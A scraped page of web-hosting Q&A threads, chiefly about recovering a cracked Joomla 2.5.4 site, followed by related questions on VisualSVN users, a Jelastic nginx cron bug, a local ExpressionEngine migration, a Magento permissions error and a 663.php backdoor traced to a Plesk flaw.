My Joomla 2.5.4 site was cracked last night. Moreover, the Joomla forum is currently down, and I can't even run Joomla's diagnostic utility. (fpa-en.php)
I have followed Joomla's instructions for diagnosis with no success. (See below) I have also emailed my webhost (I am on a shared server, but I use a host recommended by Joomla that is a specialist in Joomla sites). So, my question is what do I do next?
Here is the info that I have so far.
Using Joomla 2.54 (the latest). All extension were updated to most recent release, and none are on the Joomla vulnerable extensions list.
Passwords of other administrators were changed but not mine fortunately.
User_notes table deleted, which renders the User Manager in the admin section useless.
According to logs the attack hit the following files in this sequence:
/administrator/index.php
/index.php (Root)
/plugins/authentication/joomla/joomla.php
/plugins/user/joomla/joomla.php
and then the changes to the users and user_notes tables.
There is no junk in either index.php
Attack ip was 199.15.234.216, which is from a Fort Worth server of supremetelecom.com
Fortunately, I have backups and there was no defacement, but until I can't get fpa-en.php to work and access to the Joomla forums, I am not sure what to d0 other than change all passwords and block the ip.
Thanks in advance for any help!
Firstly, reset the passwords of all the administrators, including yours, then change them and ensure they include letters and numbers. Then change the password for the host control panel using the password generator if they provide one. If not, use a password generator online. Once this is done change the password for your database username and don't forget to also update the configuration.php with your new password.
Secondly, download and install Admin Tools which will add more security to your site for the future. Admin Tools also comes with an Emergency Offline button which is useful.
Then download and install Saxum IP Logger which will trace all the registered users, giving you their IP address, country and so on and you can also block IP addresses using the plugin that comes with it.
Next, go to the host control panel and look at the logs to see which IP addresses have entered your website and while files they have accessed. The IP address that coresponds to the files edited, you can then block using the plugin I mentioned before. Joomla 2.5 is very hard to hack so it is rather likely you have an extension that is badly developed and allows SQL injection. Therefore you should always choose popular extensions to install on your website when they are database related.
Hope this helps you in the future. Regards
EDIT : You can also password protect your folders in the FTP for additional security.
You may also find this extension quite useful
After you recover from this, make sure you place a password on the /administrator directory with .htaccess, assuming this is a Linux based server.
Couple of steps that will help you identify the point of access.
Also depends on if you have access to some server side tools.
Contact host and ask them if they run Mod_Sec if so ask them for the Mod_sec flag for that IP.
Ask the host if they run any type of maldet tools - if so ask for a scan of your account.
If you have shell access run a check on what were the most recent files changes... Side from tmp and cache files.
Fixing the hack
1. Change all your passwords -
2. Install project honey pot.
3. Admin tools install is good but you need the pro version to really gain access to the security tools.
4. Migrate to a host that specializes in Joomla platforms, in most cases they already have the accounts configured for common security issues in Joomla.
Getting hacked really sucks... Good luck!
Relocate your administrator page by editing the config.php files .. and edit your FTP permission settings. If your administration login url was the standard location. (www.site.com/administrator ) change this location and block access using your hosting control panel to only certain ip address (and even restrict access by hours of availability.
How many administrator user accounts do you have. There really should be only one person with super user access . It is really not productive or safe to have other users that do minor edits of the website with administrator privileges; and they could accidentally cause issues. These are basic steps and there is a lot more you can do. Send an email if you need help/step by step instructions. Hope all goes well.
Related
I have downloaded VisualSVN Server, version 5.1.1. In the left panel there is only Repositories and Jobs. I want to add new users for learing and testing purposes. However I can't see any settings to do so. I currently dont have a licence. Is this the main reason? If not, how can I enable Users and Groups folders or how can I reach to related settings? Keep in mind that I'm a completely newbie to this application. Any help is appreciated, thanks
I have tried to find related settings in autentication properties but I got confused and bogged down. I have tried to open the application as Administrator, still couldn't find or make sense of settings.
I also tried to find subversion authentication settings which is normally in the main page.
In the MMC snap-in, you should have a Users option down the left hand side of the tree. However, on the main Visual SVN page, you have various options, one of which should be Subversion Authentication. You can also add users and groups using the options here also (see below, for a screen shot of my SVN Server). Regarding the license, that shouldn't be an issue, as long as your requirement fits withing the "Community" licensing requirements.
If you don't see options to Create Users / Groups, use the Configure Authentication Options and set the Authentication Mode to Subversion Authentication. This will allow subversion to authenticate users based on a list that is setup within the server itself. Hope that Helps.
The Users and Groups folders are only available in the management console when your server is configured to use the standalone Subversion authentication mode. When this authentication mode is active, your server maintains a dedicated list of user and group accounts.
However, your screenshot shows that you've enabled Windows authentication. In this case, your server integrates with your Active Directory domain / Windows, and user and group accounts are maintained by Active Directory. I.e., you don't need to create users and groups in VisualSVN Server. They are already created in your domain and you can grant permissions to these accounts via the management console.
You can find more information about the authentication modes in the article KB182: VisualSVN Server authentication modes.
while setting up a basic 1 x NGINX load-balancer in front of 2 backends, I ended up in what it is clear to me to be a bug: the cron of this Certified App cannot be edited:
As you can see, in this particular App the cron file is owned by root:root and doesn't have the extended attribute (the plus on the right of permissions) necessary for the file to be edited also by the logged in user (nginx in this case).
All other certified apps allow instead the main login user to have crontabs, even though I found the permissions of each file vary a lot.
I've stumbled on https://github.com/jelastic/jem/blob/master/etc/jelastic/export.conf and it seems the file to go for proposing a bugfix, but it's last update if Aug-2016, so I guess Jelastic had closed much of its source code.
How can we contribute to Certified App source code?
indeed it is a bug as cron file of nginx user isn't editable in a balancer template, by design in has to be.
As for exports.conf - this file left for backwards comparability, but no more used.
The problem will be definitely fixed in latest templates, as for existing containers - we would like to apply a patch to fix them, if you provide us more details about hosting service provider you are using - we will help with that.
As for contribution to certified templates, all the images are publicly available on Docker Hub, you can create your own version of template based on existing one if you build a docker image and in your Dockerfile you specify
"from jelastic/nginxbalancer" as a base, then you can do any modifications to the filesystem. Next step will be just to replace existing balancer with your custom one.
Anyway, let's start with fix of existing containers.
Many thanks for finding out the bug!
Perhaps someone can share their experience or advise on how to get this accomplished.
I have looked around and found only a wiki entry dealing with server migration from host to host.
Here is the setup and things I have tried:
locally I am running win 10 with XAMPP server
hosted on hostgator
Downloaded all files from live site
Did an SQL dump/import onto my local mySQL
Edited ‘exp_sites’ for paths and URLs
Edited ‘config.php’ in system folder
Result:
- can not login into backend ...that is form refreshes but no redirect. I can tell that db is being queried since since I do get error back if it is a wrong password.
Anyone has done similar setups/downloads/takve-overs of their client’s site?
Ideally, I would just like the access to CP so I can edit the settings/paths of weblogs,uploads etc.
Thanks for your time!
Are you using CI default password library for password creation? If you are using then these passwords will not work for you because this library generate server dependent passwords.
i have a curious issue. When i start the connect manager i see a white window with the following error message: svwrap $Revision: 1.36 $
Error #619 security: script is world-writable
Does anyone have an idea what could be? I know what "world-writable" means but what file it might be? Thanks for an answer. Hermann
I'd contact your hosting company this. This message isn't generated by Magento, it's generated by a program your web hosting company has installed to scan for world writable scripts.
Also, you may want to consider a different web-host if you need to use Magento Connect's web UI. This feature requires the Magento web server user have write access to the Magento installation to download and update files. It sounds like your hosting company may not be down with that.
All that said, my guess is it's, at minimum, the downloader/index.php file.
For some reasons I have a 663.php file in every folder and subfolders of my httpdoc root in my web server ftp. I don't know where this file came from and my host does not know either
I would very much appreciate any help
Depending on it's content it could seem like a PHP Shell Backdoor.
An attacker would upload this file to gain access to your files, database ect.
They usually exploit a flaw in your application, to upload files.
Be sure to update all the software you are running.
Someone might have gained access to your site, also change all passwords.
It looks like this has occurred before to other users:
Your site has been hacked. The 663.php file is sending out anonymous
spam. If you host with GoDaddy, this is a common theme as thousands
of accounts share one IP and one person with shell access can get in
and place an htaccess file above the root folder on the server and
autoload the files into every folder in your website and onto every
site within that IP address. Year1Media
Quote from AolAnswers.
Thank you all for your help. After a little search i found out that It was a Plesk security vulnerability. The problem was solved by running a patch in parallels plesk. Apart from inserting unknown files it also changed .htaccess to redirect to weird websites.
It Is a Plesk Problem
they are correction patches here:
http://kb.parallels.com/en/113321